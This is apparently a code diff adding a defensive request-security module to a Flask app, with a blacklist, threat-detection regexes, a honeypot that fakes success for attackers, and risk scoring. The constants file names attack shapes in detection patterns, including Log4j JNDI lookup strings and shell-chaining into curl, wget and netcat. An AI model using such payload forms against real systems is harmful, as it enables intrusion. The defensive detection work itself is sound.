"BlacklistManager",
"HoneypotResponder",
"init_security_middleware",
"ResponseAction",
"ResponseHandler",
"ResponseStrategy",
"RiskScorer",
"ThreatDetector",
"ThreatResult",
]

255
security/blacklist.py Normal file
View File

@@ -0,0 +1,255 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
import threading
from datetime import timedelta
from typing import List, Optional
import db_pool
from db.utils import get_cst_now, get_cst_now_str
class BlacklistManager:
"""黑名单管理器"""
def __init__(self) -> None:
self._schema_ready = False
self._schema_lock = threading.Lock()
def is_ip_banned(self, ip: str) -> bool:
"""检查IP是否被封禁"""
ip_text = str(ip or "").strip()[:64]
if not ip_text:
return False
now_str = get_cst_now_str()
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
SELECT 1
FROM ip_blacklist
WHERE ip = ?
AND is_active = 1
AND (expires_at IS NULL OR expires_at > ?)
LIMIT 1
""",
(ip_text, now_str),
)
return cursor.fetchone() is not None
def is_user_banned(self, user_id: int) -> bool:
"""检查用户是否被封禁"""
if user_id is None:
return False
self._ensure_schema()
user_id_int = int(user_id)
now_str = get_cst_now_str()
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
SELECT 1
FROM user_blacklist
WHERE user_id = ?
AND is_active = 1
AND (expires_at IS NULL OR expires_at > ?)
LIMIT 1
""",
(user_id_int, now_str),
)
return cursor.fetchone() is not None
def ban_ip(self, ip: str, reason: str, duration_hours: int = 24, permanent: bool = False):
"""封禁IP"""
ip_text = str(ip or "").strip()[:64]
if not ip_text:
return False
reason_text = str(reason or "").strip()[:512]
now_str = get_cst_now_str()
expires_at: Optional[str]
if permanent:
expires_at = None
else:
hours = max(1, int(duration_hours))
expires_at = (get_cst_now() + timedelta(hours=hours)).strftime("%Y-%m-%d %H:%M:%S")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO ip_blacklist (ip, reason, is_active, added_at, expires_at)
VALUES (?, ?, 1, ?, ?)
ON CONFLICT(ip) DO UPDATE SET
reason = excluded.reason,
is_active = 1,
added_at = excluded.added_at,
expires_at = excluded.expires_at
""",
(ip_text, reason_text, now_str, expires_at),
)
conn.commit()
return True
def ban_user(self, user_id: int, reason: str):
"""封禁用户"""
return self._ban_user_internal(user_id, reason=reason, duration_hours=24, permanent=False)
def unban_ip(self, ip: str):
"""解除IP封禁"""
ip_text = str(ip or "").strip()[:64]
if not ip_text:
return False
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("UPDATE ip_blacklist SET is_active = 0 WHERE ip = ?", (ip_text,))
conn.commit()
return cursor.rowcount > 0
def unban_user(self, user_id: int):
"""解除用户封禁"""
if user_id is None:
return False
self._ensure_schema()
user_id_int = int(user_id)
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("UPDATE user_blacklist SET is_active = 0 WHERE user_id = ?", (user_id_int,))
conn.commit()
return cursor.rowcount > 0
def get_banned_ips(self) -> List[dict]:
"""获取所有被封禁的IP"""
now_str = get_cst_now_str()
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
SELECT ip, reason, is_active, added_at, expires_at
FROM ip_blacklist
WHERE is_active = 1
AND (expires_at IS NULL OR expires_at > ?)
ORDER BY added_at DESC
""",
(now_str,),
)
return [dict(row) for row in cursor.fetchall()]
def get_banned_users(self) -> List[dict]:
"""获取所有被封禁的用户"""
self._ensure_schema()
now_str = get_cst_now_str()
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
SELECT user_id, reason, is_active, added_at, expires_at
FROM user_blacklist
WHERE is_active = 1
AND (expires_at IS NULL OR expires_at > ?)
ORDER BY added_at DESC
""",
(now_str,),
)
return [dict(row) for row in cursor.fetchall()]
def cleanup_expired(self):
"""清理过期的封禁记录"""
now_str = get_cst_now_str()
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
UPDATE ip_blacklist
SET is_active = 0
WHERE is_active = 1
AND expires_at IS NOT NULL
AND expires_at <= ?
""",
(now_str,),
)
conn.commit()
self._ensure_schema()
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
UPDATE user_blacklist
SET is_active = 0
WHERE is_active = 1
AND expires_at IS NOT NULL
AND expires_at <= ?
""",
(now_str,),
)
conn.commit()
# ==================== Internal ====================
def _ensure_schema(self) -> None:
if self._schema_ready:
return
with self._schema_lock:
if self._schema_ready:
return
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS user_blacklist (
user_id INTEGER PRIMARY KEY,
reason TEXT,
is_active INTEGER DEFAULT 1,
added_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
expires_at TIMESTAMP
)
"""
)
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_blacklist_active ON user_blacklist(is_active)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_blacklist_expires ON user_blacklist(expires_at)")
conn.commit()
self._schema_ready = True
def _ban_user_internal(
self,
user_id: int,
*,
reason: str,
duration_hours: int = 24,
permanent: bool = False,
) -> bool:
if user_id is None:
return False
self._ensure_schema()
user_id_int = int(user_id)
reason_text = str(reason or "").strip()[:512]
now_str = get_cst_now_str()
expires_at: Optional[str]
if permanent:
expires_at = None
else:
hours = max(1, int(duration_hours))
expires_at = (get_cst_now() + timedelta(hours=hours)).strftime("%Y-%m-%d %H:%M:%S")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO user_blacklist (user_id, reason, is_active, added_at, expires_at)
VALUES (?, ?, 1, ?, ?)
ON CONFLICT(user_id) DO UPDATE SET
reason = excluded.reason,
is_active = 1,
added_at = excluded.added_at,
expires_at = excluded.expires_at
""",
(user_id_int, reason_text, now_str, expires_at),
)
conn.commit()
return True

146
security/constants.py Normal file
View File

@@ -0,0 +1,146 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
import re
# ==================== Threat Types ====================
THREAT_TYPE_JNDI_INJECTION = "jndi_injection"
THREAT_TYPE_NESTED_EXPRESSION = "nested_expression"
THREAT_TYPE_SQL_INJECTION = "sql_injection"
THREAT_TYPE_XSS = "xss"
THREAT_TYPE_PATH_TRAVERSAL = "path_traversal"
THREAT_TYPE_COMMAND_INJECTION = "command_injection"
THREAT_TYPE_SSRF = "ssrf"
THREAT_TYPE_XXE = "xxe"
THREAT_TYPE_TEMPLATE_INJECTION = "template_injection"
THREAT_TYPE_SENSITIVE_PATH_PROBE = "sensitive_path_probe"
# ==================== Scores ====================
SCORE_JNDI_DIRECT = 100
SCORE_JNDI_OBFUSCATED = 100
SCORE_NESTED_EXPRESSION = 80
SCORE_SQL_INJECTION = 90
SCORE_XSS = 70
SCORE_PATH_TRAVERSAL = 60
SCORE_COMMAND_INJECTION = 85
SCORE_SSRF = 75
SCORE_XXE = 85
SCORE_TEMPLATE_INJECTION = 70
SCORE_SENSITIVE_PATH_PROBE = 40
# ==================== JNDI (Log4j) ====================
#
# - Direct: ${jndi:ldap://...} / ${jndi:rmi://...} => 100
# - Obfuscated: ${${xxx:-j}${xxx:-n}...:ldap://...} => detect
# - Nested expression: ${${...}} => 80
JNDI_DIRECT_PATTERN = r"\$\{\s*jndi\s*:\s*(?:ldap|rmi)\s*://"
# Common Log4j "default value" obfuscation variants:
# ${${::-j}${::-n}${::-d}${::-i}:ldap://...}
# ${${foo:-j}${bar:-n}${baz:-d}${qux:-i}:rmi://...}
JNDI_OBFUSCATED_PATTERN = (
r"\$\{\s*"
r"(?:\$\{[^{}]{0,50}:-j\}|\$\{::-[jJ]\})\s*"
r"(?:\$\{[^{}]{0,50}:-n\}|\$\{::-[nN]\})\s*"
r"(?:\$\{[^{}]{0,50}:-d\}|\$\{::-[dD]\})\s*"
r"(?:\$\{[^{}]{0,50}:-i\}|\$\{::-[iI]\})\s*"
r":\s*(?:ldap|rmi)\s*://"
)
NESTED_EXPRESSION_PATTERN = r"\$\{\s*\$\{"
# ==================== SQL Injection ====================
SQLI_UNION_SELECT_PATTERN = r"\bunion\b\s+(?:all\s+)?\bselect\b"
SQLI_OR_1_EQ_1_PATTERN = r"\bor\b\s+1\s*=\s*1\b"
# ==================== XSS ====================
XSS_SCRIPT_TAG_PATTERN = r"<\s*script\b"
XSS_JS_PROTOCOL_PATTERN = r"javascript\s*:"
XSS_INLINE_EVENT_HANDLER_PATTERN = r"\bon\w+\s*="
# ==================== Path Traversal ====================
PATH_TRAVERSAL_PATTERN = r"(?:\.\./|\.\.\\)+"
# ==================== Command Injection ====================
CMD_INJECTION_OPERATOR_WITH_CMD_PATTERN = (
r"(?:;|&&|\|\||\|)\s*"
r"(?:bash|sh|zsh|cmd|powershell|pwsh|curl|wget|nc|netcat|python|perl|ruby|php|node|cat|ls|id|whoami|uname|rm)\b"
)
CMD_INJECTION_SUBSHELL_PATTERN = r"(?:`[^`]{1,200}`|\$\([^)]{1,200}\))"
# ==================== SSRF ====================
SSRF_LOCALHOST_URL_PATTERN = r"\bhttps?\s*:\s*//\s*(?:127\.0\.0\.1\b|localhost\b|0\.0\.0\.0\b)"
SSRF_INTERNAL_IP_URL_PATTERN = r"\bhttps?\s*:\s*//\s*(?:10\.|192\.168\.|172\.(?:1[6-9]|2[0-9]|3[0-1])\.)"
SSRF_DANGEROUS_PROTOCOL_PATTERN = r"\b(?:file|gopher|dict)\s*:\s*//"
# ==================== XXE ====================
XXE_DOCTYPE_PATTERN = r"<!\s*doctype\b|\bdoctype\b"
XXE_ENTITY_PATTERN = r"<!\s*entity\b|\bentity\b"
XXE_SYSTEM_PUBLIC_PATTERN = r"\b(?:system|public)\b"
# ==================== Template Injection ====================
TEMPLATE_JINJA_EXPR_PATTERN = r"\{\{\s*[^}]{0,200}\s*\}\}"
TEMPLATE_JINJA_STMT_PATTERN = r"\{%\s*[^%]{0,200}\s*%\}"
TEMPLATE_VELOCITY_DIRECTIVE_PATTERN = r"#\s*(?:set|if)\b"
# ==================== Sensitive Path Probing ====================
SENSITIVE_PATH_DOTFILES_PATTERN = r"/\.(?:git|svn|env)(?:/|\b|$)"
SENSITIVE_PATH_PROBE_PATTERN = r"/(?:actuator|phpinfo|wp-admin)(?:/|\b|$)"
# ==================== Compiled Regex ====================
_FLAGS = re.IGNORECASE | re.MULTILINE
JNDI_DIRECT_RE = re.compile(JNDI_DIRECT_PATTERN, _FLAGS)
JNDI_OBFUSCATED_RE = re.compile(JNDI_OBFUSCATED_PATTERN, _FLAGS)
NESTED_EXPRESSION_RE = re.compile(NESTED_EXPRESSION_PATTERN, _FLAGS)
SQLI_UNION_SELECT_RE = re.compile(SQLI_UNION_SELECT_PATTERN, _FLAGS)
SQLI_OR_1_EQ_1_RE = re.compile(SQLI_OR_1_EQ_1_PATTERN, _FLAGS)
XSS_SCRIPT_TAG_RE = re.compile(XSS_SCRIPT_TAG_PATTERN, _FLAGS)
XSS_JS_PROTOCOL_RE = re.compile(XSS_JS_PROTOCOL_PATTERN, _FLAGS)
XSS_INLINE_EVENT_HANDLER_RE = re.compile(XSS_INLINE_EVENT_HANDLER_PATTERN, _FLAGS)
PATH_TRAVERSAL_RE = re.compile(PATH_TRAVERSAL_PATTERN, _FLAGS)
CMD_INJECTION_OPERATOR_WITH_CMD_RE = re.compile(CMD_INJECTION_OPERATOR_WITH_CMD_PATTERN, _FLAGS)
CMD_INJECTION_SUBSHELL_RE = re.compile(CMD_INJECTION_SUBSHELL_PATTERN, _FLAGS)
SSRF_LOCALHOST_URL_RE = re.compile(SSRF_LOCALHOST_URL_PATTERN, _FLAGS)
SSRF_INTERNAL_IP_URL_RE = re.compile(SSRF_INTERNAL_IP_URL_PATTERN, _FLAGS)
SSRF_DANGEROUS_PROTOCOL_RE = re.compile(SSRF_DANGEROUS_PROTOCOL_PATTERN, _FLAGS)
XXE_DOCTYPE_RE = re.compile(XXE_DOCTYPE_PATTERN, _FLAGS)
XXE_ENTITY_RE = re.compile(XXE_ENTITY_PATTERN, _FLAGS)
XXE_SYSTEM_PUBLIC_RE = re.compile(XXE_SYSTEM_PUBLIC_PATTERN, _FLAGS)
TEMPLATE_JINJA_EXPR_RE = re.compile(TEMPLATE_JINJA_EXPR_PATTERN, _FLAGS)
TEMPLATE_JINJA_STMT_RE = re.compile(TEMPLATE_JINJA_STMT_PATTERN, _FLAGS)
TEMPLATE_VELOCITY_DIRECTIVE_RE = re.compile(TEMPLATE_VELOCITY_DIRECTIVE_PATTERN, _FLAGS)
SENSITIVE_PATH_DOTFILES_RE = re.compile(SENSITIVE_PATH_DOTFILES_PATTERN, _FLAGS)
SENSITIVE_PATH_PROBE_RE = re.compile(SENSITIVE_PATH_PROBE_PATTERN, _FLAGS)

126
security/honeypot.py Normal file
View File

@@ -0,0 +1,126 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
import random
import uuid
from typing import Any, Optional
from app_logger import get_logger
class HoneypotResponder:
"""蜜罐响应生成器 - 返回假成功响应,欺骗攻击者"""
def __init__(self, *, rng: Optional[random.Random] = None) -> None:
self._rng = rng or random.SystemRandom()
self._logger = get_logger("app")
def generate_fake_response(self, endpoint: str, original_data: dict = None) -> dict:
"""
根据端点生成假的成功响应
策略:
- 邮件发送类: {"success": True, "message": "邮件已发送"}
- 注册类: {"success": True, "user_id": fake_uuid}
- 登录类: {"success": True} 但不设置session
- 通用: {"success": True, "message": "操作成功"}
"""
endpoint_text = str(endpoint or "").strip()
endpoint_lc = endpoint_text.lower()
category = self._classify_endpoint(endpoint_lc)
response: dict[str, Any] = {"success": True}
if category == "email":
response["message"] = "邮件已发送"
elif category == "register":
response["user_id"] = str(uuid.uuid4())
elif category == "login":
# 登录类:保持正常成功响应,但不进行任何 session / token 设置(调用方负责不写 session
pass
else:
response["message"] = "操作成功"
response = self._merge_safe_fields(response, original_data)
self._logger.warning(
"蜜罐响应已生成: endpoint=%s, category=%s, keys=%s",
endpoint_text[:256],
category,
sorted(response.keys()),
)
return response
def should_use_honeypot(self, risk_score: int) -> bool:
"""风险分>=80使用蜜罐响应"""
score = self._normalize_risk_score(risk_score)
use = score >= 80
self._logger.debug("蜜罐判定: risk_score=%s => %s", score, use)
return use
def delay_response(self, risk_score: int) -> float:
"""
根据风险分计算延迟时间
0-20: 0秒
21-50: 随机0.5-1秒
51-80: 随机1-3秒
81-100: 随机3-8秒蜜罐模式额外延迟消耗攻击者时间
"""
score = self._normalize_risk_score(risk_score)
delay = 0.0
if score <= 20:
delay = 0.0
elif score <= 50:
delay = float(self._rng.uniform(0.5, 1.0))
elif score <= 80:
delay = float(self._rng.uniform(1.0, 3.0))
else:
delay = float(self._rng.uniform(3.0, 8.0))
self._logger.debug("蜜罐延迟计算: risk_score=%s => delay_seconds=%.3f", score, delay)
return delay
# ==================== Internal ====================
def _normalize_risk_score(self, risk_score: Any) -> int:
try:
score = int(risk_score)
except Exception:
score = 0
return max(0, min(100, score))
def _classify_endpoint(self, endpoint_lc: str) -> str:
if not endpoint_lc:
return "generic"
# 先匹配更具体的:注册 / 登录
if any(k in endpoint_lc for k in ["/register", "register", "signup", "sign-up"]):
return "register"
if any(k in endpoint_lc for k in ["/login", "login", "signin", "sign-in"]):
return "login"
# 邮件相关:发送验证码 / 重置密码 / 重发验证等
if any(k in endpoint_lc for k in ["email", "mail", "forgot-password", "reset-password", "resend-verify"]):
return "email"
return "generic"
def _merge_safe_fields(self, base: dict, original_data: Optional[dict]) -> dict:
if not isinstance(original_data, dict) or not original_data:
return base
# 避免把攻击者输入或真实业务结果回显得太明显;仅合并少量“形状字段”
safe_bool_keys = {"need_verify", "need_captcha"}
merged = dict(base)
for key in safe_bool_keys:
if key in original_data and key not in merged:
try:
merged[key] = bool(original_data.get(key))
except Exception:
continue
return merged

307
security/middleware.py Normal file
View File

@@ -0,0 +1,307 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
import logging
from typing import Optional
from flask import g, jsonify, request
from flask_login import current_user
from app_logger import get_logger
from app_security import get_rate_limit_ip
from .blacklist import BlacklistManager
from .honeypot import HoneypotResponder
from .response_handler import ResponseAction, ResponseHandler, ResponseStrategy
from .risk_scorer import RiskScorer
from .threat_detector import ThreatDetector, ThreatResult
# 全局实例(保持单例,避免重复初始化开销)
detector = ThreatDetector()
blacklist = BlacklistManager()
scorer = RiskScorer(blacklist_manager=blacklist)
handler: Optional[ResponseHandler] = None
honeypot: Optional[HoneypotResponder] = None
def _get_handler() -> ResponseHandler:
global handler
if handler is None:
handler = ResponseHandler()
return handler
def _get_honeypot() -> HoneypotResponder:
global honeypot
if honeypot is None:
honeypot = HoneypotResponder()
return honeypot
def _get_security_log_level(app) -> int:
level_name = str(getattr(app, "config", {}).get("SECURITY_LOG_LEVEL", "INFO") or "INFO").upper()
return int(getattr(logging, level_name, logging.INFO))
def _log(app, level: int, message: str, *args, exc_info: bool = False) -> None:
"""按 SECURITY_LOG_LEVEL 控制安全日志输出,避免过多日志影响性能。"""
try:
logger = get_logger("app")
min_level = _get_security_log_level(app)
if int(level) >= int(min_level):
logger.log(int(level), message, *args, exc_info=exc_info)
except Exception:
# 安全模块日志故障不得影响正常请求
return
def _is_static_request(app) -> bool:
"""对静态文件请求跳过安全检查以提升性能。"""
try:
path = str(getattr(request, "path", "") or "")
except Exception:
path = ""
if path.startswith("/static/"):
return True
try:
static_url_path = getattr(app, "static_url_path", None) or "/static"
if static_url_path and path.startswith(str(static_url_path).rstrip("/") + "/"):
return True
except Exception:
pass
try:
endpoint = getattr(request, "endpoint", None)
if endpoint in {"static", "serve_static"}:
return True
except Exception:
pass
return False
def _safe_get_user_id() -> Optional[int]:
try:
if hasattr(current_user, "is_authenticated") and current_user.is_authenticated:
return getattr(current_user, "id", None)
except Exception:
return None
return None
def _scan_request_threats(req) -> list[ThreatResult]:
"""仅扫描 GET query 与 POST JSON body降低开销与误报"""
threats: list[ThreatResult] = []
try:
# 1) Query 参数(所有方法均可能携带 query string
try:
args = getattr(req, "args", None)
if args:
# MultiDict -> dict(list) 以保留多值
args_dict = args.to_dict(flat=False) if hasattr(args, "to_dict") else dict(args)
threats.extend(detector.scan_input(args_dict, "args"))
except Exception:
pass
# 2) JSON body主要针对 POST其他方法保持兼容
try:
method = str(getattr(req, "method", "") or "").upper()
except Exception:
method = ""
if method in {"POST", "PUT", "PATCH", "DELETE"}:
try:
data = req.get_json(silent=True) if hasattr(req, "get_json") else None
except Exception:
data = None
if data is not None:
threats.extend(detector.scan_input(data, "json"))
except Exception:
# 扫描失败不应阻断业务
return []
threats.sort(key=lambda t: int(getattr(t, "score", 0) or 0), reverse=True)
return threats
def init_security_middleware(app):
"""初始化安全中间件到 Flask 应用。"""
try:
scorer.auto_ban_enabled = bool(app.config.get("AUTO_BAN_ENABLED", True))
except Exception:
pass
@app.before_request
def security_check():
if not bool(app.config.get("SECURITY_ENABLED", True)):
return None
if _is_static_request(app):
return None
try:
ip = get_rate_limit_ip()
except Exception:
ip = getattr(request, "remote_addr", "") or ""
user_id = _safe_get_user_id()
# 默认值,确保后续逻辑可用
g.risk_score = 0
g.response_strategy = ResponseStrategy(action=ResponseAction.ALLOW)
g.honeypot_mode = False
g.honeypot_endpoint = None
g.honeypot_generated = False
try:
# 1) 检查黑名单(静默拒绝,返回通用错误)
try:
if blacklist.is_ip_banned(ip):
_log(app, logging.WARNING, "安全拦截: IP封禁命中 ip=%s path=%s", ip, request.path[:256])
return jsonify({"error": "服务暂时繁忙,请稍后重试"}), 503
except Exception:
_log(app, logging.ERROR, "黑名单检查失败(ip) ip=%s", ip, exc_info=True)
try:
if user_id is not None and blacklist.is_user_banned(user_id):
_log(app, logging.WARNING, "安全拦截: 用户封禁命中 user_id=%s path=%s", user_id, request.path[:256])
return jsonify({"error": "服务暂时繁忙,请稍后重试"}), 503
except Exception:
_log(app, logging.ERROR, "黑名单检查失败(user) user_id=%s", user_id, exc_info=True)
# 2) 扫描威胁GET query / POST JSON
threats = _scan_request_threats(request)
if threats:
max_threat = threats[0]
_log(
app,
logging.WARNING,
"威胁检测: ip=%s user_id=%s type=%s score=%s field=%s rule=%s",
ip,
user_id,
getattr(max_threat, "threat_type", "unknown"),
getattr(max_threat, "score", 0),
getattr(max_threat, "field_name", ""),
getattr(max_threat, "rule", ""),
)
# 记录威胁事件(异常不应阻断业务)
try:
payload = getattr(max_threat, "value_preview", "") or getattr(max_threat, "matched", "") or ""
scorer.record_threat(
ip=ip,
user_id=user_id,
threat_type=getattr(max_threat, "threat_type", "unknown"),
score=int(getattr(max_threat, "score", 0) or 0),
request_path=getattr(request, "path", None),
payload=str(payload)[:500] if payload else None,
)
except Exception:
_log(app, logging.ERROR, "威胁事件记录失败 ip=%s user_id=%s", ip, user_id, exc_info=True)
# 高危威胁启用蜜罐模式
if bool(app.config.get("HONEYPOT_ENABLED", True)):
try:
if int(getattr(max_threat, "score", 0) or 0) >= 80:
g.honeypot_mode = True
g.honeypot_endpoint = getattr(request, "endpoint", None)
except Exception:
pass
# 3) 综合风险分与响应策略
try:
risk_score = scorer.get_combined_score(ip, user_id)
except Exception:
_log(app, logging.ERROR, "风险分计算失败 ip=%s user_id=%s", ip, user_id, exc_info=True)
risk_score = 0
try:
strategy = _get_handler().get_strategy(risk_score)
except Exception:
_log(app, logging.ERROR, "响应策略计算失败 risk_score=%s", risk_score, exc_info=True)
strategy = ResponseStrategy(action=ResponseAction.ALLOW)
g.risk_score = int(risk_score or 0)
g.response_strategy = strategy
# 风险分触发蜜罐模式(兼容 ResponseHandler 的 HONEYPOT 策略)
if bool(app.config.get("HONEYPOT_ENABLED", True)):
try:
if getattr(strategy, "action", None) == ResponseAction.HONEYPOT:
g.honeypot_mode = True
except Exception:
pass
# 4) 应用延迟
try:
if float(getattr(strategy, "delay_seconds", 0) or 0) > 0:
_get_handler().apply_delay(strategy)
except Exception:
_log(app, logging.ERROR, "延迟应用失败", exc_info=True)
# 优先短路:避免业务 side effects例如发送邮件/修改状态)
if getattr(g, "honeypot_mode", False) and bool(app.config.get("HONEYPOT_ENABLED", True)):
try:
fake_payload = None
try:
fake_payload = request.get_json(silent=True)
except Exception:
fake_payload = None
fake_response = _get_honeypot().generate_fake_response(
getattr(g, "honeypot_endpoint", "default"),
fake_payload if isinstance(fake_payload, dict) else None,
)
g.honeypot_generated = True
return jsonify(fake_response), 200
except Exception:
_log(app, logging.ERROR, "蜜罐响应生成失败", exc_info=True)
return None
except Exception:
# 全局兜底:安全模块任何异常都不能阻断正常请求
_log(app, logging.ERROR, "安全中间件发生异常", exc_info=True)
return None
return None # 继续正常处理
@app.after_request
def security_response(response):
"""请求后处理 - 兜底应用蜜罐响应。"""
if not bool(app.config.get("SECURITY_ENABLED", True)):
return response
if not bool(app.config.get("HONEYPOT_ENABLED", True)):
return response
try:
if _is_static_request(app):
return response
except Exception:
pass
# 如果在 before_request 已经生成过蜜罐响应,则不再覆盖,避免丢失其他 after_request 的改动
try:
if getattr(g, "honeypot_generated", False):
return response
except Exception:
pass
try:
if getattr(g, "honeypot_mode", False):
fake_payload = None
try:
fake_payload = request.get_json(silent=True)
except Exception:
fake_payload = None
fake_response = _get_honeypot().generate_fake_response(
getattr(g, "honeypot_endpoint", "default"),
fake_payload if isinstance(fake_payload, dict) else None,
)
return jsonify(fake_response), 200
except Exception:
_log(app, logging.ERROR, "请求后蜜罐覆盖失败", exc_info=True)
return response
return response

View File

@@ -0,0 +1,131 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
import random
import time
from dataclasses import dataclass
from enum import Enum
from typing import Any, Optional
from app_logger import get_logger
class ResponseAction(Enum):
ALLOW = "allow" # 正常放行
ENHANCE_CAPTCHA = "enhance_captcha" # 增强验证码
DELAY = "delay" # 静默延迟
HONEYPOT = "honeypot" # 蜜罐响应
BLOCK = "block" # 直接拒绝
@dataclass
class ResponseStrategy:
action: ResponseAction
delay_seconds: float = 0
captcha_level: int = 1 # 1=普通4位, 2=6位, 3=滑块
message: str | None = None
class ResponseHandler:
"""响应策略处理器"""
def __init__(self, *, rng: Optional[random.Random] = None) -> None:
self._rng = rng or random.SystemRandom()
self._logger = get_logger("app")
def get_strategy(self, risk_score: int, is_banned: bool = False) -> ResponseStrategy:
"""
根据风险分获取响应策略
0-20分: ALLOW, 无延迟, 普通验证码
21-40分: ALLOW, 无延迟, 6位验证码
41-60分: DELAY, 1-2秒延迟
61-80分: DELAY, 2-5秒延迟
81-100分: HONEYPOT, 3-8秒延迟
已封禁: BLOCK
"""
score = self._normalize_risk_score(risk_score)
if is_banned:
strategy = ResponseStrategy(action=ResponseAction.BLOCK, message="访问被拒绝")
self._logger.warning("响应策略: BLOCK (banned=%s, risk_score=%s)", is_banned, score)
return strategy
if score <= 20:
strategy = ResponseStrategy(action=ResponseAction.ALLOW, delay_seconds=0, captcha_level=1)
elif score <= 40:
strategy = ResponseStrategy(action=ResponseAction.ALLOW, delay_seconds=0, captcha_level=2)
elif score <= 60:
strategy = ResponseStrategy(action=ResponseAction.DELAY, delay_seconds=float(self._rng.uniform(1.0, 2.0)))
elif score <= 80:
strategy = ResponseStrategy(action=ResponseAction.DELAY, delay_seconds=float(self._rng.uniform(2.0, 5.0)))
else:
strategy = ResponseStrategy(action=ResponseAction.HONEYPOT, delay_seconds=float(self._rng.uniform(3.0, 8.0)))
strategy.captcha_level = self._normalize_captcha_level(strategy.captcha_level)
self._logger.info(
"响应策略: action=%s risk_score=%s delay=%.3f captcha_level=%s",
strategy.action.value,
score,
float(strategy.delay_seconds or 0),
int(strategy.captcha_level),
)
return strategy
def apply_delay(self, strategy: ResponseStrategy):
"""应用延迟使用time.sleep"""
if strategy is None:
return
delay = 0.0
try:
delay = float(getattr(strategy, "delay_seconds", 0) or 0)
except Exception:
delay = 0.0
if delay <= 0:
return
self._logger.debug("应用延迟: action=%s delay=%.3f", getattr(strategy.action, "value", strategy.action), delay)
time.sleep(delay)
def get_captcha_requirement(self, strategy: ResponseStrategy) -> dict:
"""返回验证码要求 {"required": True, "level": 2}"""
level = 1
try:
level = int(getattr(strategy, "captcha_level", 1) or 1)
except Exception:
level = 1
level = self._normalize_captcha_level(level)
required = True
try:
required = getattr(strategy, "action", None) != ResponseAction.BLOCK
except Exception:
required = True
payload = {"required": bool(required), "level": level}
self._logger.debug("验证码要求: %s", payload)
return payload
# ==================== Internal ====================
def _normalize_risk_score(self, risk_score: Any) -> int:
try:
score = int(risk_score)
except Exception:
score = 0
return max(0, min(100, score))
def _normalize_captcha_level(self, level: Any) -> int:
try:
i = int(level)
except Exception:
i = 1
if i <= 1:
return 1
if i == 2:
return 2
return 3

389
security/risk_scorer.py Normal file
View File

@@ -0,0 +1,389 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
import math
from dataclasses import dataclass
from datetime import timedelta
from typing import Optional
import db_pool
from db.utils import get_cst_now, get_cst_now_str, parse_cst_datetime
from . import constants as C
from .blacklist import BlacklistManager
@dataclass(frozen=True)
class _ScoreUpdateResult:
ip_score: int
user_score: int
@dataclass(frozen=True)
class _BanAction:
reason: str
duration_hours: Optional[int] = None
permanent: bool = False
class RiskScorer:
"""风险评分引擎 - 计算IP和用户的风险分数"""
def __init__(
self,
*,
auto_ban_enabled: bool = True,
auto_ban_duration_hours: int = 24,
high_risk_threshold: int = 80,
high_risk_window_hours: int = 1,
high_risk_permanent_ban_count: int = 3,
blacklist_manager: Optional[BlacklistManager] = None,
) -> None:
self.auto_ban_enabled = bool(auto_ban_enabled)
self.auto_ban_duration_hours = max(1, int(auto_ban_duration_hours))
self.high_risk_threshold = max(0, int(high_risk_threshold))
self.high_risk_window_hours = max(1, int(high_risk_window_hours))
self.high_risk_permanent_ban_count = max(1, int(high_risk_permanent_ban_count))
self.blacklist = blacklist_manager or BlacklistManager()
def get_ip_score(self, ip_address: str) -> int:
"""获取IP风险分(0-100),从数据库读取"""
ip_text = str(ip_address or "").strip()[:64]
if not ip_text:
return 0
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT risk_score FROM ip_risk_scores WHERE ip = ?", (ip_text,))
row = cursor.fetchone()
if not row:
return 0
try:
return max(0, min(100, int(row["risk_score"])))
except Exception:
return 0
def get_user_score(self, user_id: int) -> int:
"""获取用户风险分(0-100)"""
if user_id is None:
return 0
user_id_int = int(user_id)
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT risk_score FROM user_risk_scores WHERE user_id = ?", (user_id_int,))
row = cursor.fetchone()
if not row:
return 0
try:
return max(0, min(100, int(row["risk_score"])))
except Exception:
return 0
def get_combined_score(self, ip: str, user_id: int = None) -> int:
"""综合风险分 = max(IP分, 用户分) + 行为加成"""
base = max(self.get_ip_score(ip), self.get_user_score(user_id) if user_id is not None else 0)
bonus = self._get_behavior_bonus(ip, user_id)
return max(0, min(100, int(base + bonus)))
def record_threat(
self,
ip: str,
user_id: int,
threat_type: str,
score: int,
request_path: str = None,
payload: str = None,
):
"""记录威胁事件到数据库并更新IP/用户风险分"""
ip_text = str(ip or "").strip()[:64]
user_id_int = int(user_id) if user_id is not None else None
threat_type_text = str(threat_type or "").strip()[:64] or "unknown"
score_int = max(0, int(score))
path_text = str(request_path or "").strip()[:512] if request_path else None
payload_text = str(payload or "").strip() if payload else None
if payload_text and len(payload_text) > 2048:
payload_text = payload_text[:2048]
now_str = get_cst_now_str()
ip_ban_action: Optional[_BanAction] = None
user_ban_action: Optional[_BanAction] = None
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO threat_events (
threat_type, score, ip, user_id, request_path, value_preview, created_at
